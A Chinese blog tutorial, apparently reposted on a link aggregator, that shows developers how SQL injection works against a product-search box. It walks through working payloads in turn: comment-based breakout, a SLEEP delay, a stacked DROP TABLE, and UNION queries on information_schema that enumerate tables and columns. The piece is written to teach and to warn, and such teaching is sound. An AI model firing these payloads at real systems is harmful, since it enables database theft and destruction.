sql注入基本原理
source link: http://www.cnblogs.com/zhongwencool/p/sql_injection.html
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
SQL注入基本原理
WEB技术发展日新月异,但是徒手拼SQL的传统手艺还是受相当多的开发者亲睐。毕竟相比于再去学习一套复杂的 ORM 规则,手拼更说方便,直观。通常自己拼SQL的人,应该是有听说过 SQL注入 很危险,但是总是心想:我的SQL语句这么简单,不可能被注入的。
花5分钟看完这个完整的例子,从今往后应该再也不敢有以上侥幸心理了。
简单场景
有一个WEB界面提供输入商品名称,展示对应价格,生产日期及生产地信息。例如输入Hammer展示:
产品 价格 生产地 生产日期 Claw Hammer 12.98 American 2019.11.07 Club Hammer 29.98 Canada 2019.11.11我们跳过了搭建Web搜索界面的过程,直接关注重点部分: SQL注入 。
如果要实现以上功能,那么我们大致可以猜到服务器使用的SQL语句如下:
SELECT ? FROM ? WHERE ? LIKE '%Hammer%';
其中 ?
表示目前我们并不知道具体的表名和字段名,此SQL唯一可以被操纵的就是单引号里面的输入内容 '%Hammer%
。假如我们直接在查找框里输入一个单引号。即变成
select ? from ? when ? Like '%'%';
这样拼接后造成SQL语法错误,得不到任何结果,我们需要使用 --
来把最后一个单引号注释掉。
select ? from ? when ? Like '%'; -- %';
--
后的是注释内容(你也可以用 #
),这样你可以得到所有的产品信息,目前为止,还是没有嗅到危险的信号。
小试牛刀and
紧紧抓住上一步中可以扩展的单引号部分。来一个简单的延时语句试一试:
select ? from ? when ? Like '%Hammer' and 1 = SLEEP(2); --%';
这时查询会2秒后才返回结果,如果把时间延长,用脚本多点几次查询,一下就能把数据库的连接池用完。
当然,还有破坏力更强的!
select ? from ? when ? Like '%Hammer'; drop table xxxx; --%';
可以直接把表/数据库直接删除掉,至于如何知道引数据库中有哪一些表(即如何确定上句SQL中的 xxxx
)呢?
为所欲为union
我们需要知道此数据库有哪一些表!这样才能能拿到有用的信息。
使用 union
可以把不同表的内容拼在一起,小试一下:
select ?,?,?,? from ? when ? Like '%hammer' UNION (select 1,2,3,4 from dual); -- %';产品 价格 生产地 生产日期 Claw Hammer 12.98 American 2019.11.07 Club Hammer 29.98 Canada 2019.11.11 1 2 3 4
可以看到我们把假数据 1,2,3,4
成功地拼接到搜索结果中。
Mysql系统自带的信息都存在 information_schema
数据库中。我们试着在里面找找有用的信息。
select ? from ? when ? Like '%hammer' UNION (select TABLE_NAME,TABLE_SCHEMA,3,4 from information_schema.tables); --%';产品 价格 生产地 生产日期 Claw Hammer 12.98 American 2019.11.07 Club Hammer 29.98 Canada 2019.11.11 authors hawkeye 3 4 products hawkeye 3 4 user hawkeye 3 4 .... .... 3 4
现在知道了这些数据库名和表名,所有人都对它为所欲为了!( 包括上面执行的DROP )。
看着列表一猜就能知道我们目前查的是products表,接下来我们再把products具体的字段也挖出来。
select ? from ? when ? Like '%hammer' UNION (select COLUMN_NAME,TABLE_SCHEMA,3,4 from imformation_schema.columns where table_name = 'products'); --%';产品 价格 生产地 生产日期 Claw Hammer 12.98 American 2019.11.07 Club Hammer 29.98 Canada 2019.11.11 id hawkeye 3 4 name hawkeye 3 4 price hawkeye 3 4 address hawkeye 3 4 updated_at hawkeye 3 4
所以,通过上面2步,我们知道了表名和字段名,那么查询API的完整SQL应该是(把上面的 ?
都补全啦):
select name,price,address,updated_at from products where name like '%hammer';
通过不断重复以上几个步骤,你就可以通过这一个小小的入口把数据库的所有信息(比如上面发现的 user
表 )都翻个遍。
注意:以上都是在自己的机器上尝试的,千万不要越界去hack别人家的服务器!
如果你SQL注入想要更深入/系统的学习,可以使用当然你可以自己本地搭建 DVWA ,或挑战 HackMe-SQL-Injection-Challenges 。
Recommend
-
107
批量检测SQL注入 muhe 2018-01-11 13:00:12 1417750 19
-
16
攻击JavaWeb应用[3]-SQL注入[1] 园长 ·
-
14
SQL注入速查表(上) Yinz ·...
-
15
在漏洞盒子挖洞已经有一段时间了,虽说还不是大佬,但技术也有所进步,安全行业就是这样,只有自己动手去做,才能将理论的知识变为个人的经验。本篇文章打算分享一下我在挖显错型SQL注入漏洞过程中的一些个人理解,如有不足也请大佬不吝指...
-
34
注入点位置 增 - insert中 查 - where后 查 - limit注入 查 - order by注入 改 - up...
-
20
sql注入中写入webshell的几种方式 sql注入中写入webshell的几种方式 secure_file_priv="c:/…"被注释掉或者是web路径 php.ini中的get_magic_quotes_gpc()函数未开启 其中secure_...
-
11
P.S.本文整理自《sql注入天书》,部分内容摘抄自这本书,加以小修改,和一些注解,记录下自己在学习过程中遇到的坑。 关于系统数据库information_schema 所有数据库:select schema_name from information_schema.sc...
-
15
ASP.NET Core应用基本编程模式[2]:依赖注入 基于IHostBui...
-
12
Web 安全漏洞之 SQL 注入什么是 SQL 注入“有人的地方就有江湖,有数据库存在的地方就可能存在 S...
-
6
毫不夸张地说,整个ASP.NET Core就是建立在依赖注入框架之上的。ASP.NET Core应用在启动时构建管道所需的服务,以及管道处理请求使用到的服务,均来源于依赖注入容器。依赖注入容器不仅为ASP.NET Core框架自身提供必要的服务,还为应用程序提供服务,依赖注入已...
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK